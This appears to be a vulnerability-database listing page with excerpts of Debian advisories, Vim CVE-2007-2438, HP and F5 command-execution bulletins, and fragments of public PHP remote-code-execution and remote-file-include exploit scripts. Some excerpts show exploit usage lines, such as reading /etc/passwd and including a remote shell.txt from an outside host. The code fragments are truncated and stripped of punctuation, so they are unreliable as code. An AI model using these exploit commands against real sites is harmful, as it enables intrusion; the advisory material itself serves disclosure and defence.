Debian: Security Advisory (DSA-760-1)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2008 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Debian Security Advisory DSA 957-1 (imagemagick)

The remote host is missing an update to imagemagick announced via advisory DSA 957-1. Florian Weimer discovered that delegate code in ImageMagick is vulnerable to shell command injection using specially crafted file names. This allows attackers to encode commands inside of graphic commands. With...

HP notebooks remote code execution vulnerability (multiple series)

Advisory: ///////// Multiple Hewlett-Packard notebook series are prone to a remote code execution attack. The manufacturer's preinstalled software contains a critical flaw within the software built to support one-touch button quick feature access. Overview: ///////// Software called "HP Info...

HP Compaq Notebooks - ActiveX Remote Code Execution

HP Compaq Notebooks - ActiveX Remote Code Execution !- Advisory: Multiple Hewlett-Packard notebook series are prone to a remote code execution attack. The manufacturer's preinstalled software contains a critical flaw within the software built to support one-touch button quick feature access...

[SECURITY] [DSA 1364-2] New vim packages fix several vulnerabilities

-------------------------------------------------------------------------- Debian Security Advisory DSA 1364-2 [email protected] http://www.debian.org/security/ dann frazier September 19th, 2007 http://www.debian.org/security/faq - -...

DSA-1364-2 vim - several vulnerabilities

Bulletin has no description...

[SECURITY] [DSA 1364-1] New vim packages fix several vulnerabilities

-------------------------------------------------------------------------- Debian Security Advisory DSA 1364-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff September 1st, 2007 http://www.debian.org/security/faq -...

phpDVD v1.0.4 (dvd_config_file) Remote File Include Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? print ' //'=============================================================================================== //'Script : phpDVD v1.0.4 //'Author : iLker Kandemir ilkerkandemiratmynet.com //'S.Page :...

PHP Blue Dragon CMS 3.0.0 - Remote Code Execution

PHP Blue Dragon CMS 3.0.0 - Remote Code Execution 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i;...

Php Blue Dragon CMS 3.0.0 Remote Code Execution Exploit

No description provided by source. ?php // Exploit Name: Php Blue Dragon CMS 3.0.0 Code Execution Exploit //Script Homepage: http://phpbluedragon.pl/ // Autor: Kacper [email protected] // Autor Homepage: devilteam.eu | kacper.bblog.pl //Pozdrawiam wszystkich ludzi z DEVIL TEAM, Zapraszam na irc...

Remote shell command execution in extensions embedding PHPMailer

Multiple TYPO3 extensions is affected by the third party tool PHPMailer, which is vulnerable to a remote shell command execution. Component Type: Third party tool. This tool is not part of the TYPO3 default installation. Affected extensions: agprjmgm version 0.0.1 bbphpmailer version 1.73.1 and a...

F5 FirePass 4100 SSL VPN My.Activiation.PHP3远程命令注入漏洞

F5's FirePass SSL VPN提供使用标准WEB浏览器对应用程序和数据进行安全访问的解决方案。 F5 FirePass 4100不正确过滤用户提交的输入，远程攻击者可以利用漏洞以WEB权限执行任意命令。 问题是'my.activation.php3'脚本对用户提交的'username'参数缺少过滤，在部分条件下允许用户注入Linux SHELL命令，导致以WEB权限执行。 F5 FirePass 4100 厂商解决方案 可参考如下安全公告获得补丁信息： https://tech.f5.com/home/solutions/sol167.html...

inoutse-exec.txt

!/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc this is not a protection for two reasons: i everyone can make a cookie with false credentials ii there isn't any exit or die function after header'Location: index.php' Now look at create...

Fundanemt 2.2.0 - spellcheck.php Remote Code Execution

Fundanemt 2.2.0 - spellcheck.php Remote Code Execution 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i...

[SECURITY] [DSA 1297-1] New gforge-plugin-scmcvs packages fix arbitrary shell command execution

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - -------------------------------------------------------------------------- Debian Security Advisory DSA 1297-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff May 24th, 2007 http://www.debian.org/security/faq -...

Alstrasoft Template Seller Pro 3.25 - Remote Code Execution

!/usr/bin/php -q -d shortopentag=on Thanks to rgod for the php code and Marty for the Love "; if $argc4 echo "Usage: php ".$argv0." Host Path CMD Host: target server ip/hostname Path: path of template CMD: A Shell Command Example: php ".$argv0." localhost /template/ cat /etc/passwd"; die;...

mxbb-rfi.txt

!/usr/bin/php -q -d shortopentag=on cmd: a shell command ls -la Options: -pport: specify a port other than 80 -Pip:port: specify a proxy Example: php '.$argv0.' localhost http://www.shellsite.com/shell.txt ls -la -P1.1.1.1:80 shell.txt:...

CVE-2007-2438

The sandbox for vim allows dangerous functions such as 1 writefile, 2 feedkeys, and 3 system, which might allow user-assisted attackers to execute shell commands and write files via modelines...

CVE-2007-2438

CVE-2007-2438 targets Vim’s sandbox, where modeline parsing grants access to dangerous functions (writefile, feedkeys, system), enabling user-assisted execution of shell commands and file writes. The issue affects Vim components exposed to modelines and has been addressed in multiple advisories a...

CVE-2007-2438

The sandbox for vim allows dangerous functions such as 1 writefile, 2 feedkeys, and 3 system, which might allow user-assisted attackers to execute shell commands and write files via modelines...